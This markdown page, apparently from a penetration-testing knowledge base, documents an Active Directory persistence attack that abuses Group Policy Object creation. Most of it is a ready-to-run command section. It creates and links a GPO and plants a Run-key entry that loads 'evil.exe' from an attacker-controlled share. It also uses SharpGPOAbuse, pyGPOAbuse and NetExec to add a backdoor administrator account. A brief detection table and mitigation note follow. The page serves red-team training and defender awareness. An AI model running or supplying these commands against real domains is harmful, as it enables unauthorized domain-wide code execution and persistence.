attack-66-malicious-gpo-creation.md (3597B)
1 --- 2 title: "Attack #66 β Malicious GPO Creation" 3 description: "An attacker with GPO creation rights (or who compromises a GPO-managing account) can create or modify Group Policy Objects to execute malicious scriptsβ¦" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory"] 7 tools: ["NetExec", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/π€ Attack #66 β Malicious GPO Creation.md" 11 --- 12 # π€ Attack #66 β Malicious GPO Creation 13 14 *** 15 16 ## π How It Works 17 18 An attacker with **GPO creation rights** (or who compromises a GPO-managing account) can create or modify Group Policy Objects to execute malicious scripts, create scheduled tasks, or deploy software across the domain. GPOs can target specific OUs β allowing precise payload delivery to selected groups of machines or users. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **GPO creation/edit rights** | Typically Group Policy Creator Owners or DA | 27 | **GPO linked to target OU** | Must link GPO for it to apply | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ Create new GPO ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 35 New-GPO -Name "IT Maintenance" | New-GPLink -Target "OU=Servers,DC=corp,DC=local" 36 37 # ββ Add startup script to GPO βββββββββββββββββββββββββββββββββββββββββββββββββ 38 Set-GPPrefRegistryValue -Name "IT Maintenance" -Action Create \ 39 -Context Computer -Key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' \ 40 -ValueName 'Maintenance' -Type String -Value '\\ATTACKER\share\evil.exe' 41 42 # ββ SharpGPOAbuse (automated GPO abuse) βββββββββββββββββββββββββββββββββββββββ 43 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" \ 44 --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" \ 45 --Arguments "/c net user hacker P@ss! /add && net localgroup Administrators hacker /add" \ 46 --GPOName "IT Maintenance" 47 48 # ββ pyGPOAbuse (Linux) ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 49 python3 pygpoabuse.py corp.local/Administrator:'Password1' \ 50 -gpo-id "12345678-ABCD-1234-ABCD-123456789012" \ 51 -command "net user hacker P@ss! /add" -f 52 ``` 53 54 ```bash 55 # ββ NetExec β execute via GPO βββββββββββββββββββββββββββββββββββββββββββββββββ 56 nxc smb DC01.corp.local -u Administrator -p 'Password1' -M gpo_abuse 57 ``` 58 59 *** 60 61 ## π‘οΈ Detection β Event IDs 62 63 | Event ID | Source | What to Look For | 64 |---|---|---| 65 | **5136** | Security Log (DC) | GroupPolicyContainer object modified | 66 | **4688** | Security Log | Script execution from GPO startup/logon path | 67 | **5145** | Security Log | SYSVOL script access | 68 69 *** 70 71 ## π Attack Chain Context 72 73 ``` 74 [Malicious GPO] βββ Domain-wide code execution via Group Policy 75 β 76 ββββ π» Deploy malware, create admin users, disable AV across the domain 77 ββββ π GPO applies on reboot/logon β patient persistence 78 ββββ π Defeated by: restrict GPO creation rights, audit GPO changes 79 ``` 80 81 *** 82 83 > β **Attack #66 β Malicious GPO Creation complete.**